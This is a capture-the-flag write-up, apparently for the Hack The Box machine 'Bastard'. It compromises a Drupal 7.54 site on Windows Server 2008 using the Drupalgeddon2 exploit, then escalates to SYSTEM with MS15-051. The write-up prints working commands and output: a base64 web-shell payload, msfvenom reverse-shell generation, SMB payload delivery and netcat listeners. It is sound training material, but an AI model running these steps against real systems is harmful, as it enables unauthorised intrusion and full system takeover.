My first step was to perform an Nmap scan against the machine:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
# Nmap 7.91 scan initiated Fri Dec 18 14:03:28 2020 as: nmap -sV -sC -p- -oN scan -O 10.10.10.9
Nmap scan report for 10.10.10.9
Host is up (0.029s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_ Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
135/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Dec 18 14:08:24 2020 -- 1 IP address (1 host up) scanned in 296.09 seconds
We can see from the output that there are a number of ports open. HTTP on port 80 running Drupal, Also 135 and 49154 running MSRPC. I decided to start with port 80 as this is the one I’m most familiar with.
By browsing to http://10.10.10.9/CHANGELOG.txt you can see that it is running drupal version 7.54. I used searchsploit to identify vulnerabilities in this version of Drupal.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
┌──(root💀kali)-[/home/kali/Downloads/ms15-051/MS15-051-KB3045171]
└─# searchsploit drupal 7
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Drupal 4.1/4.2 - Cross-Site Scripting | php/webapps/22940.txt
Drupal 4.5.3 < 4.6.1 - Comments PHP Injection | php/webapps/1088.pl
Drupal 4.7 - 'Attachment mod_mime' Remote Command Execution | php/webapps/1821.php
Drupal 4.x - URL-Encoded Input HTML Injection | php/webapps/27020.txt
Drupal 5.2 - PHP Zend Hash ation Vector | php/webapps/4510.txt
Drupal 6.15 - Multiple Persistent Cross-Site Scripting Vulnerabilities | php/webapps/11060.txt
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User) | php/webapps/34992.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session) | php/webapps/44355.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (1) | php/webapps/34984.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (2) | php/webapps/34993.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execution) | php/webapps/35150.php
Drupal 7.12 - Multiple Vulnerabilities | php/webapps/18564.txt
Drupal 7.x Module Services - Remote Code Execution | php/webapps/41564.php
Drupal < 4.7.6 - Post Comments Remote Command Execution | php/webapps/3313.pl
Drupal < 5.1 - Post Comments Remote Command Execution | php/webapps/3312.pl
Drupal < 5.22/6.16 - Multiple Vulnerabilities | php/webapps/33706.txt
Drupal < 7.34 - Denial of Service | php/dos/35415.txt
Drupal < 7.34 - Denial of Service | php/dos/35415.txt
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit) | php/webapps/44557.rb
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC) | php/webapps/44542.txt
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution | php/webapps/44449.rb
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution | php/webapps/44449.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit) | php/remote/44482.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit) | php/remote/44482.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC) | php/webapps/44448.py
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) | php/remote/46510.rb
Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution | php/webapps/46452.txt
Drupal < 8.6.9 - REST Module Remote Code Execution | php/webapps/46459.py
Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure | php/webapps/44501.txt
Drupal Module CKEditor < 4.1WYSIWYG (Drupal 6.x/7.x) - Persistent Cross-Site Scripting | php/webapps/25493.txt
Drupal Module CODER 2.5 - Remote Command Execution (Metasploit) | php/webapps/40149.rb
Drupal Module Coder < 7.x-1.3/7.x-2.6 - Remote Code Execution | php/remote/40144.php
Drupal Module Cumulus 5.x-1.1/6.x-1.4 - 'tagcloud' Cross-Site Scripting | php/webapps/35397.txt
Drupal Module Drag & Drop Gallery 6.x-1.5 - 'upload.php' Arbitrary File Upload | php/webapps/37453.php
Drupal Module Embedded Media Field/Media 6.x : Video Flotsam/Media: Audio Flotsam - Multiple Vulnerabilities | php/webapps/35072.txt
Drupal Module RESTWS 7.x - PHP Remote Code Execution (Metasploit) | php/remote/40130.rb
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
After some trial and error I discovered that the “Drupalgeddon2” exploit 44449.rb was successfull.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
┌──(root💀kali)-[/home/kali/Documents/bastard]
└─# ruby 44449 http://10.10.10.9 2 ⚙
ruby: warning: shebang line ending with \r may cause problems
[*] --==[::#Drupalggedon2::]==--
--------------------------------------------------------------------------------
[i] Target : http://10.10.10.9/
--------------------------------------------------------------------------------
[+] Found : http://10.10.10.9/CHANGELOG.txt (HTTP Response: 200)
[+] Drupal!: v7.54
--------------------------------------------------------------------------------
[*] Testing: Form (user/password)
[+] Result : Form valid
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Clean URLs
[+] Result : Clean URLs enabled
--------------------------------------------------------------------------------
[*] Testing: Code Execution (Method: name)
[i] Payload: echo YVSJVABF
[+] Result : YVSJVABF
[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!
--------------------------------------------------------------------------------
[*] Testing: Existing file (http://10.10.10.9/shell.php)
[i] Response: HTTP 404 // Size: 12
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Writing To Web Root (./)
[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee shell.php
[!] Target is NOT exploitable [2-4] (HTTP Response: 404)... Might not have write access?
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Existing file (http://10.10.10.9/sites/default/shell.php)
[i] Response: HTTP 404 // Size: 12
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Writing To Web Root (sites/default/)
[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee sites/default/shell.php
[!] Target is NOT exploitable [2-4] (HTTP Response: 404)... Might not have write access?
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Existing file (http://10.10.10.9/sites/default/files/shell.php)
[i] Response: HTTP 404 // Size: 12
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Writing To Web Root (sites/default/files/)
[*] Moving : ./sites/default/files/.htaccess
[i] Payload: mv -f sites/default/files/.htaccess sites/default/files/.htaccess-bak; echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee sites/default/files/shell.php
[!] Target is NOT exploitable [2-4] (HTTP Response: 404)... Might not have write access?
[!] FAILED : Couldn't find a writeable web path
--------------------------------------------------------------------------------
[*] Dropping back to direct OS commands
drupalgeddon2>> whoami
nt authority\iusr
drupalgeddon2>>
You can see from the output that a shell was spawned and I was logged in as the user isur. This shell however wasnt persistent. So I generated a reverse shell in msfvenom:
1
2
3
4
5
6
7
┌──(root💀kali)-[/var/www]
└─# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.19 LPORT=2600 -f exe > reverse.exe 1 ⚙
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
I then started an SMB server on the kali machine to host the reverse.exe reverse shell I just created:
1
2
──(root💀kali)-[/var/www]
└─# python3 smbserver.py testshare -smb2support /var/www/
I then started a netcat listener on the kali machine port port 2600 to capture the reverse shell.
1
2
3
┌──(root💀kali)-[/home/kali]
└─# nc -nvlp 2600 1 ⨯ 1 ⚙
listening on [any] 2600 ...
The reverse shell was then downloaded to the Bastard machine using the drupalgeddon2 shell and executed.
1
2
3
drupalgeddon2>> copy \\10.10.14.19\testshare\reverse.exe
1 file(s) copied.
drupalgeddon2>> reverse.exe
From the output below, you can see that the shell was successfully captured in netcat, and the user flag was captured.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
┌──(root💀kali)-[/home/kali]
└─# nc -nvlp 2600 1 ⨯ 1 ⚙
listening on [any] 2600 ...
connect to [10.10.14.19] from (UNKNOWN) [10.10.10.9] 49739
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\inetpub\drupal-7.54>cd /users
cd /users
C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is 605B-4AAA
Directory of C:\Users
19/03/2017 07:35 �� <DIR> .
19/03/2017 07:35 �� <DIR> ..
19/03/2017 01:20 �� <DIR> Administrator
19/03/2017 01:54 �� <DIR> Classic .NET AppPool
19/03/2017 07:35 �� <DIR> dimitris
14/07/2009 06:57 �� <DIR> Public
0 File(s) 0 bytes
6 Dir(s) 30.807.498.752 bytes free
C:\Users>cd dimitris
cd dimitris
C:\Users\dimitris>cd Desktop
cd Desktop
C:\Users\dimitris\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 605B-4AAA
Directory of C:\Users\dimitris\Desktop
19/03/2017 08:04 �� <DIR> .
19/03/2017 08:04 �� <DIR> ..
19/03/2017 08:06 �� 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 30.807.498.752 bytes free
C:\Users\dimitris\Desktop>type user.txt
type user.txt
[REDACTED]
The next step was to esclate privilages. I ran systeminfo and discovered that it was an unpatched Server 2008 machine.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
C:\Users\dimitris\Desktop>systeminfo
systeminfo
Host Name: BASTARD
OS Name: Microsoft Windows Server 2008 R2 Datacenter
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00496-001-0001283-84782
Original Install Date: 18/3/2017, 7:04:46 ��
System Boot Time: 27/12/2020, 3:37:18 ��
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
[02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 2.047 MB
Available Physical Memory: 1.536 MB
Virtual Memory: Max Size: 4.095 MB
Virtual Memory: Available: 3.530 MB
Virtual Memory: In Use: 565 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.9
Because of this, there are multiple kernel exploits that should be successful in escalating privilages. I decided to try MS15-015 as I had had some luck with this exploit in the past. I downloaded the ZIP file from the github page, extracted the 64bit exe and copied it into /var/www so it can be transfered to the Bastard machine.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
┌──(root💀kali)-[/home/kali/Downloads/ms15-051]
└─# unzip MS15-051-KB3045171.zip
Archive: MS15-051-KB3045171.zip
creating: MS15-051-KB3045171/
inflating: MS15-051-KB3045171/ms15-051.exe
inflating: MS15-051-KB3045171/ms15-051x64.exe
creating: MS15-051-KB3045171/Source/
creating: MS15-051-KB3045171/Source/ms15-051/
inflating: MS15-051-KB3045171/Source/ms15-051/ms15-051.cpp
inflating: MS15-051-KB3045171/Source/ms15-051/ms15-051.vcxproj
inflating: MS15-051-KB3045171/Source/ms15-051/ms15-051.vcxproj.filters
inflating: MS15-051-KB3045171/Source/ms15-051/ms15-051.vcxproj.user
inflating: MS15-051-KB3045171/Source/ms15-051/ntdll.lib
inflating: MS15-051-KB3045171/Source/ms15-051/ntdll64.lib
inflating: MS15-051-KB3045171/Source/ms15-051/ReadMe.txt
creating: MS15-051-KB3045171/Source/ms15-051/Win32/
inflating: MS15-051-KB3045171/Source/ms15-051/Win32/ms15-051.exe
creating: MS15-051-KB3045171/Source/ms15-051/x64/
inflating: MS15-051-KB3045171/Source/ms15-051/x64/ms15-051x64.exe
inflating: MS15-051-KB3045171/Source/ms15-051.sln
inflating: MS15-051-KB3045171/Source/ms15-051.suo
┌──(root💀kali)-[/home/kali/Downloads/ms15-051]
└─# ls
MS15-051-KB3045171 MS15-051-KB3045171.zip
┌──(root💀kali)-[/home/kali/Downloads/ms15-051]
└─# cd MS15-051-KB3045171
┌──(root💀kali)-[/home/kali/Downloads/ms15-051/MS15-051-KB3045171]
└─# ls
ms15-051.exe ms15-051x64.exe Source
┌──(root💀kali)-[/home/kali/Downloads/ms15-051/MS15-051-KB3045171]
└─# cp ms15-051x64.exe /var/www
When this exe is run, it takes the command you want to execute as the argument. So I decided to create another reverse shell going to port 2602 on the Kali machine. This is what I execute as the argument of the MS15-051 exploit. I essentially get a SYSTEM privilage reverse shell. I created the reverse shell:
1
2
3
4
5
6
7
┌──(root💀kali)-[/var/www]
└─# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.19 LPORT=2602 -f exe > reverse2602.exe 1 ⚙
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Then on the Bastard machine copied both the reverse shell and the MS15-051 exploit to the machine.
1
2
3
4
5
6
7
C:\inetpub\drupal-7.54>copy \\10.10.14.19\testshare\ms15-051x64.exe
copy \\10.10.14.19\testshare\ms15-051x64.exe
1 file(s) copied.
C:\inetpub\drupal-7.54>copy \\10.10.14.19\testshare\reverse2602.exe
copy \\10.10.14.19\testshare\reverse2602.exe
1 file(s) copied.
A new netcat listener was then started on the kali machine listening on port 2602 to capture the new reverse shell.
1
2
3
┌──(root💀kali)-[/var/www]
└─# nc -nvlp 2602
listening on [any] 2602 ...
The exploit was then run:
1
2
3
4
5
6
7
8
9
10
C:\inetpub\drupal-7.54>ms15-051-x64.exe "reverse2602.exe"
ms15-051-x64.exe "reverse2602.exe"
'ms15-051-x64.exe' is not recognized as an internal or external command,
operable program or batch file.
C:\inetpub\drupal-7.54>ms15-051x64.exe "reverse2602.exe"
ms15-051x64.exe "reverse2602.exe"
[#] ms15-051 fixed by zcgonvh
[!] process with pid: 624 created.
==============================
You can see from the output berlow, the reverse system shell was successfully captured and was able to capture the root flag.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
┌──(root💀kali)-[/var/www]
└─# nc -nvlp 2602
listening on [any] 2602 ...
connect to [10.10.14.19] from (UNKNOWN) [10.10.10.9] 49681
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\inetpub\drupal-7.54>whoami
whoami
nt authority\system
C:\inetpub\drupal-7.54>cd /
cd /
C:\>cd Users
cd Users
C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is 605B-4AAA
Directory of C:\Users
19/03/2017 07:35 �� <DIR> .
19/03/2017 07:35 �� <DIR> ..
19/03/2017 01:20 �� <DIR> Administrator
19/03/2017 01:54 �� <DIR> Classic .NET AppPool
19/03/2017 07:35 �� <DIR> dimitris
14/07/2009 06:57 �� <DIR> Public
0 File(s) 0 bytes
6 Dir(s) 30.807.498.752 bytes free
C:\Users>cd Administrator
cd Administrator
C:\Users\Administrator>dir
dir
Volume in drive C has no label.
Volume Serial Number is 605B-4AAA
Directory of C:\Users\Administrator
19/03/2017 01:20 �� <DIR> .
19/03/2017 01:20 �� <DIR> ..
19/03/2017 01:20 �� <DIR> Contacts
19/03/2017 07:33 �� <DIR> Desktop
19/03/2017 02:09 �� <DIR> Documents
19/03/2017 12:42 �� <DIR> Downloads
19/03/2017 01:20 �� <DIR> Favorites
19/03/2017 01:20 �� <DIR> Links
19/03/2017 01:20 �� <DIR> Music
19/03/2017 01:20 �� <DIR> Pictures
19/03/2017 01:20 �� <DIR> Saved Games
19/03/2017 01:20 �� <DIR> Searches
19/03/2017 01:20 �� <DIR> Videos
0 File(s) 0 bytes
13 Dir(s) 30.807.498.752 bytes free
C:\Users\Administrator>cd Desktop
cd Desktop
C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 605B-4AAA
Directory of C:\Users\Administrator\Desktop
19/03/2017 07:33 �� <DIR> .
19/03/2017 07:33 �� <DIR> ..
19/03/2017 07:34 �� 32 root.txt.txt
1 File(s) 32 bytes
2 Dir(s) 30.807.498.752 bytes free
C:\Users\Administrator\Desktop>type root.txt.txt
type root.txt.txt
[REDACTED]